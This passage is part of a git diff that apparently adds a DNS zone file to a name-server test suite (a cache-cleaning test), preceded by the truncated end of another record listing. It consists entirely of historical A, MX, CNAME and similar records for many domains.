IN A 192.228.128.18 +NS.GU. 604800 IN A 168.123.4.10 +mx00.schlund.de. 604800 IN A 195.20.224.67 +mx00.schlund.de. 604800 IN A 195.20.224.68 +mx00.schlund.de. 604800 IN A 195.20.224.130 +mx00.schlund.de. 604800 IN A 195.20.224.152 +mx00.schlund.de. 604800 IN A 195.20.224.198 +CADDSYS.IPTEK.net. 604800 IN A 202.46.1.2 +NS0.TELIA.NIC.NU. 604800 IN A 212.181.91.4 +NS2.GRANITECANYON.com. 604800 IN A 204.1.217.148 +GATEKEEPER.corning.com. 604800 IN A 149.42.1.2 +NS2.2DAY.com. 604800 IN A 202.89.128.74 +1.0.0.127.IN-ADDR.ARPA. 604800 IN PTR localhost. +RAIN.PSG.com. 604800 IN A 147.28.0.34 +STRAWB.MIT.EDU. 604800 IN A 18.71.0.151 +NS2.DIGISERVE.com. 604800 IN A 204.91.84.216 +UMACSN2.UMAC.MO. 604800 IN A 161.64.3.2 +NS.JM. 604800 IN A 196.2.1.6 +12.153.66.206.IN-ADDR.ARPA. 604800 IN PTR d.dd.org. +EAST.ISI.EDU. 604800 IN A 38.245.76.2 +NS2.UUNET.CA. 604800 IN A 142.77.1.5 +SUNNY.STAT-USA.GOV. 604800 IN A 192.239.70.8 +BOW.INTNET.CF. 604800 IN A 194.206.73.253 +NS4.TELE.DK. 604800 IN A 194.239.134.84 +NS2.sodak.net. 604800 IN A 63.65.239.225 +NS1.NEWYORK.US.NETDNS.com. 604800 IN A 216.32.212.86 +NS2.PSI.net. 604800 IN A 38.8.50.2 +NS.KREONET.RE.KR. 604800 IN A 134.75.30.1 +GIANT.MINDLINK.net. 604800 IN A 204.174.18.2 +NS0.SECTOR001.org. 604800 IN A 24.4.49.117 +DNS.SEABONE.net. 604800 IN A 195.22.205.163 +NS2.MANA.PF. 604800 IN A 202.3.225.20 +NRWEB.CENPAC.NET.NR. 604800 IN A 203.98.224.66 +www.TRAVELPHOTOCONTESTS.com. 604800 IN A 64.85.86.156 +NS1.REGEX.com. 604800 IN A 202.152.12.227 +BIGBIRD.ITD.nps.GOV. 604800 IN A 165.83.208.5 +CUNIXD.CC.COLUMBIA.EDU. 604800 IN A 128.59.35.142 +NS1.CLASSIFIEDMONSTER.com. 604800 IN A 216.254.54.22 +SERVER1.SANS.org. 604800 IN A 167.216.133.33 +BRONZE.COIL.com. 604800 IN A 198.4.94.1 +SCSNMS.SWITCH.CH. 604800 IN A 130.59.1.30 +SCSNMS.SWITCH.CH. 604800 IN A 130.59.10.30 +SCE.CNC.UNA.PY. 604800 IN A 200.10.228.133 +RELAY.LA.TIS.com. 604800 IN A 198.51.22.11 +NS.AUSTIN.IBM.com. 604800 IN A 192.35.232.34 +SERVICE.robert-morris.EDU. 604800 IN A 205.146.48.22 +MERCURY.ML.org. 604800 IN A 209.68.0.85 +proxy.pccf.net. 604800 IN A 205.189.73.123 +DUB-NAME-SVC-1.compuserve.com. 604800 IN A 149.174.213.5 +NS.CNRI.reston.va.us. 604800 IN A 132.151.1.1 +NS.UCAD.SN. 604800 IN A 196.1.95.1 +ns01.ny.us.ibm.net. 604800 IN A 165.87.194.244 +NS4-AUTH.ALASKA.net. 604800 IN A 209.112.130.4 +BOW.INTNET.NE. 604800 IN A 194.51.164.253 +NS-JP.SINET.AD.JP. 604800 IN A 150.100.2.3 +ns.musin.de. 604800 IN A 194.113.40.45 +ip1.romkey.SEG.net. 604800 IN A 207.121.69.234 +DNS2.ITD.UMICH.EDU. 604800 IN A 141.211.125.15 +mail.rpi.EDU. 604800 IN A 128.113.100.7 +INECO.NIC.ES. 604800 IN A 194.69.254.2 +DNS2.FIREHOUSE.net. 604800 IN A 63.160.175.18 +BOW.INTNET.BJ. 604800 IN A 194.51.163.253 +sundown.vtc.VSC.EDU. 604800 IN A 155.42.12.12 +NIC.AIX.GR. 604800 IN A 195.130.89.210 +NIC.AD.JP. 604800 IN A 202.12.30.33 +NS.DC.IGC.org. 604800 IN A 199.75.208.10 +LHR.NS.GDNS.net. 604800 IN A 212.250.25.101 +NS2.WEBMAGIC.net. 604800 IN A 64.168.49.66 +MUNNARI.OZ.AU. 604800 IN A 128.250.1.21 +HIPPO.RU.AC.ZA. 604800 IN A 146.231.128.1 +PEBBLES.IOM.com. 604800 IN A 194.72.124.1 +penpal.dmz.RPSLMC.EDU. 604800 IN A 144.74.60.151 +netnews.HINET.net. 604800 IN A 168.95.195.16 +INS2.TOSA.TWTELECOM.net. 604800 IN A 204.95.160.4 +proxy6.cisco.com. 604800 IN A 203.41.198.245 +NS2.HOST4U.net. 604800 IN A 209.150.129.3 +POIPARAU.OYSTER.NET.CK. 604800 IN A 202.65.32.127 +NS-EXT.VIX.com. 604800 IN A 204.152.184.64 +NS2.NURSAT.net. 604800 IN A 212.13.167.1 +mail2.kw.com.CN. 604800 IN A 159.226.25.8 +NS-02B.ANS.net. 604800 IN A 207.24.245.178 +DNS.RCCN.net. 604800 IN A 193.136.7.17 +B.ROOT-SERVERS.ORSC. 604800 IN A 216.13.126.116 +FIREHOUSE.net. 604800 IN A 63.160.175.19 diff --git a/bin/tests/system/cacheclean/ns1/example.db b/bin/tests/system/cacheclean/ns1/example.db new file mode 100644 index 0000000..7262109 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/example.db @@ -0,0 +1,2942 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +$ORIGIN . +. IN SOA hostmaster.nominum.com. a.root-servers.nil. ( + 2000042100 + 600 + 600 + 1200 + 600 + ) +. NS a.root-servers.nil. +a.root-servers.nil IN A 10.53.0.1 +localhost IN A 127.0.0.1 +$ORIGIN NIC.AC. +NS IN A 194.205.62.120 +$ORIGIN AD. +DNS2 IN A 194.158.64.8 +DINIS IN A 194.158.64.7 +$ORIGIN NIC.AD. +DNS IN A 194.158.67.251 +$ORIGIN STA.AD. +CORREU IN A 194.158.67.1 +$ORIGIN EMIRATES.NET.AE. +NS2 IN A 194.170.1.7 +NS1 IN A 194.170.1.6 +$ORIGIN BA. +NS IN A 195.130.35.5 +$ORIGIN UTIC.NET.BA. +SAVA IN A 195.130.35.3 +$ORIGIN OFFSHORE.AI. +NS1 IN A 209.88.68.34 +$ORIGIN BD. +DNS1 IN A 209.58.24.5 +DNS IN A 209.58.24.3 +$ORIGIN MENTOR.BE. +APHEX IN A 193.121.64.5 +$ORIGIN EUNET.BE. +SECDNS IN A 193.74.208.139 +$ORIGIN BELNET.BE. +NS IN A 193.190.198.10 + IN A 193.190.198.2 +$ORIGIN DNS.BE. +MASTER IN A 194.7.171.243 +$ORIGIN CS.KULEUVEN.AC.BE. +DNS IN A 134.58.40.4 +$ORIGIN CURINFO.AN. +NS01-SERVER IN A 200.44.117.129 +KADUSHI IN A 200.44.117.130 +$ORIGIN ONATEL.BF. +NAHOURI IN A 206.82.130.195 +$ORIGIN DIGSYS.BG. +NS IN A 192.92.129.1 +$ORIGIN BATELCO.COM.BH. +SV10 IN A 193.188.124.227 +NS2 IN A 193.188.97.212 +NS IN A 193.188.97.197 +$ORIGIN UTORONTO.CA. +ns2 IN A 128.100.102.202 +ns1 IN A 128.100.100.129 +chime IN A 128.100.102.201 +$ORIGIN cs.UTORONTO.CA. +bay IN A 128.100.1.1 +$ORIGIN UTCC.UTORONTO.CA. +DNS2 IN A 128.100.102.201 +$ORIGIN UUNET.CA. +NS2 IN A 142.77.1.5 +NS IN A 142.77.1.1 +$ORIGIN CIRA.CA. +MERLE IN A 64.26.149.98 +$ORIGIN cmc.ec.gc.CA. +castor IN A 142.135.4.14 +$ORIGIN RISQ.QC.CA. +CLOUSO IN A 192.26.210.1 +$ORIGIN MBNET.MB.CA. +ACCESS IN A 130.179.16.143 +$ORIGIN CDNNET.CA. +RELAY IN A 192.73.5.1 +$ORIGIN uwaterloo.CA. +ns2 IN A 129.97.128.100 +math IN A 129.97.140.144 + IN A 129.97.216.42 + IN MX 0 math.uwaterloo.ca. +ns1 IN A 129.97.128.10 +$ORIGIN AR. +CTINA IN A 200.16.97.17 +ATHEA IN A 200.16.98.2 +$ORIGIN NIC.AR. +TULKU IN A 200.16.97.77 +$ORIGIN RETINA.AR. +NS1 IN A 200.10.202.3 +$ORIGIN INTNET.BJ. +BOW IN A 194.51.163.253 +$ORIGIN NIC.CD. +DNS IN A 194.38.74.11 +$ORIGIN tahina.priv.at. +styx IN A 194.152.163.253 +$ORIGIN UNIVIE.AC.at. +NS2 IN A 193.171.255.66 +NS7 IN A 194.246.96.192 +NS1 IN A 193.171.255.2 +$ORIGIN OZ.AU. +MUNNARI IN A 128.250.1.21 +$ORIGIN CS.MU.OZ.AU. +MULGA IN A 128.250.1.22 + IN A 128.250.37.150 +$ORIGIN AARNET.EDU.AU. +JATZ IN A 139.130.204.4 +$ORIGIN ANU.EDU.AU. +CHEOPS IN A 150.203.224.24 +$ORIGIN CS.UOW.EDU.AU. +WRAITH IN A 130.130.64.1 +$ORIGIN ALCANET.COM.AU. +NS IN A 203.62.196.10 +$ORIGIN CONNECT.COM.AU. +YARRINA IN A 192.189.54.17 +$ORIGIN IBL.BM. +NS1 IN A 199.172.192.1 +$ORIGIN BRUNET.BN. +JTB IN A 202.160.8.2 +$ORIGIN INTNET.CF. +BOW IN A 194.206.73.253 +$ORIGIN SETARNET.AW. +NS2 IN A 206.48.100.11 +NS1 IN A 206.48.100.5 +$ORIGIN BOLNET.BO. +UTAMA IN A 166.114.1.40 +$ORIGIN SWITCH.CH. +SCSNMS IN A 130.59.1.30 + IN A 130.59.10.30 +MERAPI IN A 130.59.211.10 +$ORIGIN ITU.CH. +NS IN A 156.106.192.121 +$ORIGIN NIC.CH. +DOMREG IN A 130.59.1.80 +$ORIGIN ip6.INT. +z IN A 198.32.2.66 + IN AAAA 3ffe:0:1::c60:242 +$ORIGIN DNS.BR. +NS2 IN A 200.19.119.99 +NS1 IN A 200.255.253.234 +NS IN A 143.108.23.2 +$ORIGIN OYSTER.NET.CK. +POIPARAU IN A 202.65.32.127 +PARAU IN A 202.65.32.128 +$ORIGIN DRUKNET.NET.BT. +NS IN A 202.144.128.200 +$ORIGIN DCC.UCHILE.CL. +NS IN A 146.83.5.204 +$ORIGIN NIC.CL. +NS IN A 146.83.4.11 +$ORIGIN FIRSTCOM.CL. +NS IN A 200.27.2.2 +$ORIGIN EDU. +ISI IN A 128.9.176.32 +UMASS IN MX 20 vcmr-54.server.rpi.edu. + IN MX 1 mail.rpi.edu. +dartmouth IN A 129.170.16.6 + IN MX 10 donner.dartmouth.edu. + IN MX 10 prancer.dartmouth.edu. + IN MX 10 vixen.dartmouth.edu. + IN MX 10 blitzen.dartmouth.edu. + IN MX 0 mailhub.dartmouth.edu. + IN MX 10 dasher.dartmouth.edu. +rush IN MX 30 penpal.dmz.rpslmc.edu. + IN MX 10 detox.cc1.rpslmc.edu. + IN MX 20 rush.cc1.rpslmc.edu. +NYU IN A 128.122.253.92 +GATECH IN A 130.207.244.244 +ARIZONA IN A 128.196.128.233 +stanford IN A 171.64.14.120 + IN MX 20 Leland.stanford.edu. + IN MX 20 Leland2.stanford.edu. + IN MX 20 Leland3.stanford.edu. +$ORIGIN jhuapl.EDU. +ECSEL IN A 128.244.65.29 +APLDNS2 IN A 128.244.194.100 +ABACUS IN A 128.244.197.32 +$ORIGIN MIT.EDU. +STRAWB IN A 18.71.0.151 +W20NS IN A 18.70.0.160 +BITSY IN A 18.72.0.3 +$ORIGIN ITD.UMICH.EDU. +DNS2 IN A 141.211.125.15 +$ORIGIN ISI.EDU. +EAST IN A 38.245.76.2 +VENERA IN A 128.9.176.32 +NS IN A 128.9.128.127 +$ORIGIN CS.PURDUE.EDU. +PENDRAGON IN A 128.10.2.5 +$ORIGIN CS.WISC.EDU. +DNS IN A 128.105.2.10 +$ORIGIN UMD.EDU. +TRANTOR IN A 128.8.10.14 +$ORIGIN RPSLMC.EDU. +THUMPER IN A 144.74.22.8 +$ORIGIN dmz.RPSLMC.EDU. +penpal IN A 144.74.60.151 +$ORIGIN cc1.RPSLMC.EDU. +rush IN A 144.74.150.23 +detox IN A 144.74.150.44 +$ORIGIN IS.RPSLMC.EDU. +SUNSTROKE IN A 144.74.21.8 +$ORIGIN VSC.EDU. +vtc IN MX 0 eve.vtc.vsc.edu. +MAZE IN A 155.42.1.89 +ENIGMA IN A 155.42.1.7 +$ORIGIN vtc.VSC.EDU. +sundown IN A 155.42.12.12 +eve IN A 155.42.12.102 +$ORIGIN UMASS.EDU. +NS1 IN A 128.119.166.14 +NIC IN A 128.119.175.14 +$ORIGIN oit.UMASS.EDU. +supai IN A 128.119.175.6 +ponzi IN A 128.119.166.18 +$ORIGIN ECS.UMASS.EDU. +KIRA IN A 128.119.91.10 +$ORIGIN CS.UMASS.EDU. +UNIX1 IN A 128.119.40.12 +$ORIGIN UPR.CLU.EDU. +UPR1 IN A 136.145.1.4 +$ORIGIN PRINCETON.EDU. +DNS IN A 128.112.129.15 +$ORIGIN rpi.EDU. +mail IN A 128.113.100.7 +$ORIGIN server.rpi.EDU. +vcmr-54 IN A 128.113.113.44 +$ORIGIN acs.rpi.EDU. +freefour IN A 128.113.24.91 +$ORIGIN ITS.rpi.EDU. +NETSERV2 IN A 128.113.1.3 +NETSERV1 IN A 128.113.1.5 +$ORIGIN uvm.EDU. +NS1 IN A 132.198.201.10 +NS2 IN A 132.198.202.10 +$ORIGIN dartmouth.EDU. +dasher IN A 129.170.208.6 +mailhub IN A 129.170.16.6 +donner IN A 129.170.208.3 +prancer IN A 129.170.208.2 +vixen IN A 129.170.208.15 +NS1 IN A 129.170.17.4 +blitzen IN A 129.170.208.4 +NS2 IN A 129.170.16.4 +$ORIGIN middlebury.EDU. +CATAMOUNT IN A 140.233.2.204 +LION IN A 140.233.1.4 +$ORIGIN CIT.CORNELL.EDU. +DNS IN A 192.35.82.50 +$ORIGIN CS.CORNELL.EDU. +SIMON IN A 128.84.154.10 +$ORIGIN BERKELEY.EDU. +NS2 IN A 128.32.136.12 + IN A 128.32.206.12 +NS1 IN A 128.32.136.9 + IN A 128.32.206.9 +$ORIGIN CS.BERKELEY.EDU. +VANGOGH IN A 128.32.33.5 +$ORIGIN ctr.COLUMBIA.EDU. +ntp IN CNAME sirius.ctr.columbia.edu. +sirius IN A 128.59.64.60 +$ORIGIN CC.COLUMBIA.EDU. +CUNIXD IN A 128.59.35.142 +$ORIGIN UOREGON.EDU. +PHLOEM IN A 128.223.32.35 +$ORIGIN GATECH.EDU. +TROLL-GW IN A 130.207.244.251 +$ORIGIN CC.GATECH.EDU. +BURDELL IN A 130.207.3.207 +$ORIGIN UTK.EDU. +NS0 IN A 160.36.0.66 +NS1 IN A 160.36.128.66 +$ORIGIN robert-morris.EDU. +SERVICE IN A 205.146.48.22 +COLONIAL-SERVER IN A 205.146.48.25 +$ORIGIN CNS.vt.EDU. +YARDBIRD IN A 198.82.247.34 +MILO IN A 198.82.247.98 +$ORIGIN stanford.EDU. +Leland2 IN A 171.64.14.58 +AVALLONE IN A 171.64.2.210 +ATALANTE IN A 171.64.2.220 +ARGUS IN A 171.64.2.230 +$ORIGIN slac.stanford.EDU. +SMTP IN A 134.79.18.80 +NS2 IN A 134.79.16.10 +NS1 IN A 134.79.16.9 +$ORIGIN HARVARD.EDU. +NS2 IN A 128.103.1.1 +ns IN A 128.103.201.100 +NS1 IN A 128.103.200.101 +$ORIGIN med.HARVARD.EDU. +jenner IN A 134.174.141.2 +knight IN A 134.174.141.46 +eno IN A 134.174.141.50 +heckle IN A 134.174.146.152 +$ORIGIN de. +datingagentur IN A 212.227.216.57 + IN MX 10 mx01.schlund.de. + IN MX 10 mx00.schlund.de. +$ORIGIN schlund.de. +mx00 IN A 195.20.224.130 + IN A 195.20.224.198 + IN A 195.20.224.67 + IN A 195.20.224.68 + IN A 195.20.224.152 +ns4 IN A 195.20.225.36 +mx01 IN A 195.20.224.131 + IN A 195.20.224.236 + IN A 195.20.224.237 + IN A 195.20.224.238 +ns3 IN A 195.20.224.95 +$ORIGIN Informatik.Uni-Dortmund.de. +waldorf IN A 129.217.4.42 +$ORIGIN muc.de. +faerber IN MX 10 slarti.muc.de. + IN A 193.149.49.70 +ns2 IN A 193.149.48.2 +slarti IN A 193.149.48.10 +ns1 IN A 193.149.48.11 +$ORIGIN westfalen.de. +muenster IN A 193.174.5.2 +$ORIGIN lan-ks.de. +uranus IN A 194.45.71.1 +$ORIGIN kaben-net.de. +dns IN A 195.179.28.17 +$ORIGIN thur.de. +jengate IN A 193.174.15.34 +$ORIGIN erfurt.thur.de. +annwfn IN A 194.122.210.3 +$ORIGIN sgh-net.de. +ns1 IN A 212.86.129.142 +$ORIGIN DENIC.de. +SSS-NL IN A 193.0.0.237 +SSS-AT IN A 193.171.255.34 +DNS IN A 194.246.96.79 +$ORIGIN iks-jena.de. +avalon IN A 194.221.90.34 +$ORIGIN musin.de. +ns IN A 194.113.40.45 +$ORIGIN rrz.Uni-Koeln.de. +noc IN A 134.95.100.209 +$ORIGIN BelWue.de. +noc IN A 129.143.2.1 +$ORIGIN HRZ.uni-bielefeld.de. +noc IN A 129.70.5.16 +$ORIGIN techfak.uni-bielefeld.de. +techfac IN A 129.70.132.100 +$ORIGIN CUBE.de. +NS1 IN A 212.162.54.243 +$ORIGIN dtag.de. +pns IN A 194.25.0.125 +$ORIGIN netconx.de. +netconsult IN A 193.141.75.1 +$ORIGIN CAMNET.CM. +KIM IN A 195.24.192.35 +LOM IN A 195.24.192.34 +SANAGA IN A 195.24.192.17 +$ORIGIN sxtyptt.NET.CN. +ns IN A 202.99.192.68 +$ORIGIN sta.NET.CN. +ns IN A 202.96.199.133 +$ORIGIN BTA.NET.CN. +NS IN A 202.96.0.133 +$ORIGIN CNNIC.NET.CN. +sld-ns2 IN A 202.97.16.197 +DNS2 IN A 202.97.16.196 +sld-ns1 IN A 159.226.1.3 +$ORIGIN com.CN. +kw IN MX 15 mail2.kw.com.cn. +$ORIGIN kw.com.CN. +mail2 IN A 159.226.25.8 +ns IN A 159.226.25.8 +$ORIGIN CNC.AC.CN. +NS IN A 159.226.1.1 +$ORIGIN UNIANDES.EDU.CO. +AYAX IN A 157.253.50.30 +CDCNET IN A 157.253.1.13 +$ORIGIN SCSI.GOV.BY. +SUN IN A 195.50.5.103 +NS2 IN A 194.67.193.130 +$ORIGIN OPEN.BY. +A IN A 194.226.121.36 +$ORIGIN CR. +NS IN A 163.178.8.2 +$ORIGIN UCR.AC.CR. +NS IN A 163.178.88.2 +$ORIGIN INTNET.DJ. +BOW IN A 193.251.143.253 +$ORIGIN DARENET.DK. +NS-SOA IN A 130.226.1.4 +$ORIGIN TELE.DK. +NS4 IN A 194.239.134.84 +$ORIGIN DAIMI.AAU.DK. +URANUS IN A 130.225.16.40 +$ORIGIN DK-HOSTMASTER.DK. +NS IN A 193.163.102.2 +$ORIGIN EC. +ECNET IN A 157.100.45.2 +$ORIGIN NET.EC. +ECUA IN A 157.100.1.2 +$ORIGIN CENIAI.NET.CU. +NS IN A 169.158.128.136 +$ORIGIN EENET.EE. +NS IN A 193.40.56.245 +$ORIGIN KBFI.EE. +NS IN A 192.121.251.13 +$ORIGIN NIC.DO. +NS IN A 207.176.16.50 +$ORIGIN EUN.EG. +FRCU IN A 193.227.1.1 +$ORIGIN CIX.CX. +NS IN A 195.222.235.216 +$ORIGIN CX.ESCROW.IOCOMM.NET.CX. +NS1 IN A 203.132.96.2 +$ORIGIN CCS.UCY.AC.CY. +NICOSIA IN A 194.42.6.97 +$ORIGIN CC.UCY.AC.CY. +ZEUS IN A 194.42.1.1 +$ORIGIN EUNET.CZ. +CZ IN A 193.85.3.130 +$ORIGIN EUNET.FI. +PRIFI IN A 193.66.1.146 +$ORIGIN NIXU.FI. +NS IN A 193.209.237.29 +$ORIGIN TELE.FI. +NS IN A 193.210.19.19 +$ORIGIN HELSINKI.FI. +HYDRA IN A 128.214.4.29 +$ORIGIN INET.GA. +KOMO IN A 208.148.44.1 +$ORIGIN CERIST.DZ. +DECST IN A 193.194.64.11 +$ORIGIN ELDJAZAIR.NET.DZ. +CASBAH IN A 193.194.81.45 +$ORIGIN USP.AC.FJ. +TERI IN A 144.120.8.1 +$ORIGIN EUNET.ES. +NS IN A 193.127.1.11 +$ORIGIN NIC.ES. +INECO IN A 194.69.254.2 +NS1 IN A 194.69.254.1 +$ORIGIN VISUALCOM.ES. +NS IN A 194.143.202.202 +$ORIGIN MICROASTUR.ES. +SERVIDOR IN A 195.76.178.5 +$ORIGIN CESCA.ES. +PRADES IN A 192.94.163.152 +$ORIGIN PIXAR.ES. +NS IN A 194.143.196.3 +$ORIGIN REDIRIS.ES. +SUN IN A 130.206.1.2 +$ORIGIN SEKER.ES. +CORREOS IN A 194.179.87.1 +$ORIGIN TELECOM.NET.ET. +NS IN A 196.27.22.43 +$ORIGIN FM. +FM03 IN A 206.49.89.4 +FM01 IN A 206.49.89.2 +$ORIGIN NPLUS.GF. +NS1 IN A 195.6.144.3 +$ORIGIN trns. +f IN A 209.133.38.16 +d IN A 207.112.147.14 +e IN A 145.89.234.7 +c IN A 212.172.21.254 +a IN A 64.6.65.10 +$ORIGIN IRD.FR. +NS IN A 195.83.14.1 +$ORIGIN BONDY.IRD.FR. +MALAKULA IN A 193.50.53.1 +$ORIGIN RAIN.FR. +BOW IN A 194.51.3.49 +$ORIGIN imag.FR. +isis IN A 129.88.32.24 +imag IN A 129.88.30.1 +$ORIGIN INRIA.FR. +DNS IN A 193.51.208.13 +$ORIGIN NIC.FR. +NS2 IN A 192.93.0.4 +NS1 IN A 192.93.0.1 +NS3 IN A 192.134.0.49 +$ORIGIN GH.GL. +KAASASSUK IN A 194.177.232.3 +$ORIGIN TELE.GL. +TGSERV IN A 194.177.224.7 +$ORIGIN COMMIT.GM. +NS1 IN A 63.77.152.177 +$ORIGIN MRC.GM. +NS1 IN A 212.60.69.1 +$ORIGIN INTNET.GQ. +BOW IN A 195.101.152.253 +$ORIGIN AIX.GR. +NIC IN A 195.130.89.210 +$ORIGIN GRNET.GR. +FOO IN A 194.177.210.211 +NIC IN A 194.177.210.210 +$ORIGIN CSI.FORTH.GR. +ESTIA IN A 139.91.191.3 +$ORIGIN ICS.FORTH.GR. +DNS1 IN A 139.91.151.70 +GRDNS IN A 139.91.1.1 +$ORIGIN HKU.HK. +HKUXB IN A 147.8.16.15 +$ORIGIN CUHK.EDU.HK. +NS2 IN A 137.189.6.21 +NS1 IN A 137.189.6.1 +$ORIGIN CONCYT.GOB.GT. +NS IN A 168.234.106.2 +$ORIGIN UVG.EDU.GT. +NS IN A 168.234.68.2 +$ORIGIN ID. +NS1 IN A 202.155.30.227 +$ORIGIN AC.ID. +NS IN A 202.159.124.34 +$ORIGIN GU. +NS IN A 168.123.4.10 +$ORIGIN EDU.GU. +NS IN A 168.123.2.50 +$ORIGIN REGISTRY.HM. +NS2 IN A 209.54.168.55 +NS3 IN A 202.169.102.24 +NS1 IN A 204.144.183.78 +$ORIGIN CONNECT.IE. +AUTH01 IN A 194.106.128.50 +$ORIGIN DOMAINREGISTRY.IE. +BANBA IN A 193.1.142.2 +$ORIGIN VIA-NET-WORKS.IE. +ICE IN A 212.17.32.2 +$ORIGIN HONDUTEL.HN. +MIRAF-SERVER3 IN A 206.48.104.142 +$ORIGIN SRCE.HR. +DNS IN A 161.53.3.7 +$ORIGIN HUJI.AC.IL. +RELAY IN A 128.139.6.1 +$ORIGIN TAU.AC.IL. +ARISTO IN A 132.66.32.10 +$ORIGIN NIC.JE. +NS1 IN A 216.110.45.224 +$ORIGIN SZTAKI.HU. +NS2 IN A 193.225.86.1 +$ORIGIN NIC.HU. +NS IN A 193.6.27.62 +$ORIGIN NCST.ERNET.IN. +NAAMAK IN A 202.41.110.66 +SS585 IN A 202.141.150.18 +$ORIGIN NIC.IO. +NS IN A 194.205.62.100 +$ORIGIN NIC.IR. +NS1 IN A 194.225.70.83 +$ORIGIN IS. +ISGATE IN A 193.4.58.51 +$ORIGIN IUNET.IT. +DNS2 IN A 192.106.1.31 +NS IN A 192.106.1.1 +$ORIGIN INFN.IT. +SERVER2 IN A 131.154.1.3 +$ORIGIN CNR.IT. +NAMESERVER IN A 194.119.192.34 +$ORIGIN IAT.CNR.IT. +ITGBOX IN A 146.48.65.46 +$ORIGIN NETTUNO.IT. +BOLOGNA IN A 193.43.2.5 +$ORIGIN NIC.IT. +DNS IN A 193.205.245.5 +$ORIGIN JM. +NS IN A 196.2.1.6 +$ORIGIN CAST.EDU.JM. +NS IN A 200.9.115.2 +$ORIGIN NIC.GOV.JO. +AMRA IN A 193.188.66.103 +PETRA IN A 193.188.66.2 +$ORIGIN KG. +NS IN A 195.38.160.36 +$ORIGIN AD.JP. +NIC IN A 202.12.30.33 +$ORIGIN ocn.AD.JP. +ns-tk012 IN A 203.139.160.74 +$ORIGIN IIJ.AD.JP. +NS0 IN A 202.232.2.34 +$ORIGIN SINET.AD.JP. +NS-JP IN A 150.100.2.3 +$ORIGIN SPIN.AD.JP. +DNS0 IN A 165.76.0.98 +$ORIGIN NIC.AD.JP. +ns2 IN A 202.12.30.133 +TRF IN A 192.41.192.2 +NS-JP IN A 61.120.151.100 +NS0 IN A 202.12.30.131 +ns1 IN A 202.12.30.33 +$ORIGIN WIDE.AD.JP. +NS IN A 203.178.136.63 + IN MX 10 integra.s-integra.co.jp. +$ORIGIN s-integra.co.JP. +integra IN A 210.162.202.34 +$ORIGIN UUCP.NE.JP. +NS2 IN A 210.141.111.69 +$ORIGIN DNS.NET.KH. +NS1 IN A 203.127.100.21 +$ORIGIN org. +netsage IN A 209.67.235.38 +ietf IN A 132.151.1.19 + IN MX 10 odin.ietf.org. +vmba IN MX 10 gro.dd.org. +bnfinfo IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +dd IN MX 10 gro.dd.org. + IN MX 50 mqueue.sover.net. + IN MX 100 mail.uu.net. +vtvast IN A 207.217.96.38 + IN A 207.217.96.39 + IN A 207.217.96.40 + IN A 207.217.96.41 + IN A 207.217.96.42 + IN A 207.217.96.43 + IN A 207.217.96.44 + IN A 207.217.96.45 + IN A 207.217.96.28 + IN A 207.217.96.29 + IN A 207.217.96.30 + IN A 207.217.96.31 + IN A 207.217.96.32 + IN A 207.217.96.33 + IN A 207.217.96.34 + IN A 207.217.96.35 + IN A 207.217.96.36 + IN A 207.217.96.37 + IN MX 10 vipmailgate.earthlink.net. +gazpacho IN A 209.67.235.38 +bikeclub IN MX 20 pop.shoreham.net. + IN MX 50 smtp.america.net. +giffordmed IN A 130.189.100.57 + IN MX 20 quest-net.com. + IN MX 10 mail.giffordmed.org. +isc IN A 204.152.184.101 +icann IN MX 100 mail.icann.org. + IN MX 95 mailhub.icann.org. +xaos IN A 24.93.15.22 + IN TXT "XAOS Associates Online Services" + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. + IN LOC 43 02 20.000 N 77 43 12.000 W 170.00m 1.00m 30.00m 10.00m +mmuuf IN MX 10 gro.dd.org. +reptiles IN A 198.96.117.142 + IN MX 10 mail2.reptiles.org. + IN MX 20 mail.vex.net. + IN MX 5 mail.reptiles.org. +iscvt IN A 207.136.209.132 + IN MX 10 isc-01.iscvt.org. + IN MX 20 mqueue.sover.net. +mailinglists IN A 63.160.175.18 +lawlinevt IN MX 20 mqueue.sover.net. + IN MX 10 host3.vtlegalaid.org. +mail-abuse IN A 204.152.184.74 +$ORIGIN SECTOR001.org. +NS0 IN A 24.4.49.117 +NS1 IN A 24.4.49.246 +$ORIGIN ML.org. +MERCURY IN A 209.68.0.85 +$ORIGIN XBILL.org. +NS IN A 204.152.186.163 +$ORIGIN spack.org. +maus IN A 204.245.198.90 +$ORIGIN netsage.org. +keith IN A 209.67.235.37 +www IN CNAME netsage.org. +sure IN A 209.67.235.38 +$ORIGIN ietf.org. +odin IN A 132.151.1.176 +www2 IN A 4.17.168.6 +www IN CNAME www2.ietf.org. +$ORIGIN lux.dot-eu.org. +ns0 IN A 195.206.105.102 +$ORIGIN the-frontier.org. +ns2 IN A 216.86.199.115 +ns1 IN A 216.86.199.114 +$ORIGIN vmba.org. +www IN MX 10 gro.dd.org. + IN A 209.198.103.206 +$ORIGIN WILLIAM.org. +JOANNA IN A 195.153.6.2 +$ORIGIN FROGHOUSE.org. +DNS IN A 207.121.69.243 +$ORIGIN VTLEGALAID.org. +host3 IN A 207.136.208.115 +$ORIGIN dd.org. +doubt IN A 209.198.103.193 +news IN CNAME gro.dd.org. +gro IN A 209.198.103.200 +d IN A 209.198.103.199 +workgroup IN A 209.198.103.201 +dhcp1 IN A 209.198.103.194 +go IN A 209.198.103.198 +mail IN CNAME gro.dd.org. +localhost IN A 127.0.0.1 +dhcp2 IN A 209.198.103.195 +www IN CNAME gro.dd.org. +dhcp3 IN A 209.198.103.196 +dhcp4 IN A 209.198.103.197 +moderators IN CNAME moderators.isc.org. +ns IN CNAME gro.dd.org. +$ORIGIN gazpacho.org. +keith IN A 209.67.235.37 +sure IN A 209.67.235.38 +$ORIGIN FLAME.org. +DNS02 IN A 204.152.184.97 +www IN A 204.152.184.97 +DNS01 IN A 204.152.184.80 +$ORIGIN giffordmed.org. +mail IN A 130.189.100.51 +$ORIGIN isc.org. +isrv3-i IN A 204.152.184.87 +$ORIGIN energyenhancement.org. +www IN A 216.121.175.228 +$ORIGIN icann.org. +mailhub IN A 192.0.34.33 +mail IN A 198.32.1.99 +$ORIGIN 